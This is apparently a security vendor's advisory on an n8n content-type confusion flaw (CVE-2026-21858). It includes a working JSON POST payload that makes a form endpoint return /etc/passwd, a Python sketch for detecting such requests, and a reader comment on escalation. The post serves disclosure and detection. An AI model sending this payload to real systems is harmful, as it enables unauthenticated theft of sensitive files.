
n8n (Ni8mare) Content-Type Confusion - Arbitrary File Read (CVE-2026-21858)

  • Jan 16


Application Details

n8n is a powerful, open-source workflow automation tool that lets you visually connect applications, APIs, and data to automate repetitive tasks, acting as a "digital assistant" for business processes.


Vulnerability

n8n is vulnerable to an arbitrary file read attack where an attacker could potentially access files through execution of certain form-based workflows.


Identification

A vulnerable workflow could grant access to an unauthenticated remote attacker, resulting in exposure of sensitive information stored on the system.


POST /form/82848bc4-5ea2-4e5a-8bb6-3c09b94a8c5d

{
  "files": {
    "field-0": {
      "filepath": "/etc/passwd",
      "originalFilename": "product-spec.pdf",
      "mimeType": "text/plain",
      "extension": ""
    }
  },
  "data": [
    "not really important"
  ],
  "executionId": "not really important"
}

Detection

By turning this into a traffic file and matching rule, we are able to detect arbitrary file read attempts to the application.
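
A minimal sketch of the matching logic described above, added here as an example (it is not Idappcom's signature 8026715 and not n8n code): it flags a POST to a /form/ path whose JSON body supplies a files entry with a client-chosen filepath, as in the request shown on this page. The function name, the host name and both sample requests are constructed for illustration.

```python
import json

# Constructed sample requests (not captured traffic). SUSPICIOUS mirrors the
# request shown on this page; BENIGN is an ordinary JSON form submission.
SUSPICIOUS = (
    "POST /form/82848bc4-5ea2-4e5a-8bb6-3c09b94a8c5d HTTP/1.1\r\n"
    "Host: n8n.example.internal\r\n\r\n"
    '{"files": {"field-0": {"filepath": "/etc/passwd", '
    '"originalFilename": "product-spec.pdf", "mimeType": "text/plain", '
    '"extension": ""}}, "data": ["x"], "executionId": "x"}'
)
BENIGN = (
    "POST /form/82848bc4-5ea2-4e5a-8bb6-3c09b94a8c5d HTTP/1.1\r\n"
    "Host: n8n.example.internal\r\n\r\n"
    '{"name": "Alice", "comment": "files attached separately"}'
)


def flag_form_file_read(raw_request: str) -> list[str]:
    """Return every client-supplied 'filepath' found in a POST to /form/..."""
    head, _, body = raw_request.partition("\r\n\r\n")
    request_line = head.split("\r\n", 1)[0].split(" ")
    if len(request_line) < 2 or request_line[0] != "POST":
        return []
    # Path prefix taken from the request shown on this page.
    if not request_line[1].startswith("/form/"):
        return []
    try:
        parsed = json.loads(body)
    except ValueError:
        return []  # body is not JSON (e.g. multipart), out of scope here
    files = parsed.get("files") if isinstance(parsed, dict) else None
    if not isinstance(files, dict):
        return []
    # A form submission has no reason to name a server-side path itself.
    return [
        entry["filepath"]
        for entry in files.values()
        if isinstance(entry, dict) and isinstance(entry.get("filepath"), str)
    ]


if __name__ == "__main__":
    for name, req in (("suspicious", SUSPICIOUS), ("benign", BENIGN)):
        print(name, flag_form_file_read(req))
```
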


Coverage

Idappcom have created signature 8026715 along with a traffic file for this vulnerability.



Traffic IQ

If you are concerned that your business may be at risk from this vulnerability or others, why not try out our Traffic IQ software, which can scan your defences and report any issues? Learn more here: https://www.idappcom.co.uk/traffic-iq-professional

1 Comment


I found this post really interesting because it highlights how a seemingly small issue like content-type confusion can turn into a serious security risk in modern automation tools. The “Ni8mare” vulnerability in n8n shows how important proper validation is, especially when dealing with file uploads and webhook handling, since attackers can manipulate requests to access sensitive data without even needing authentication. What stood out to me is how this flaw allows arbitrary file reads, which can then escalate into much bigger problems like extracting credentials, forging admin sessions, and eventually full system compromise. It really shows how interconnected systems are today, where one weak point in an automation platform can expose a whole chain of services and data. I also…
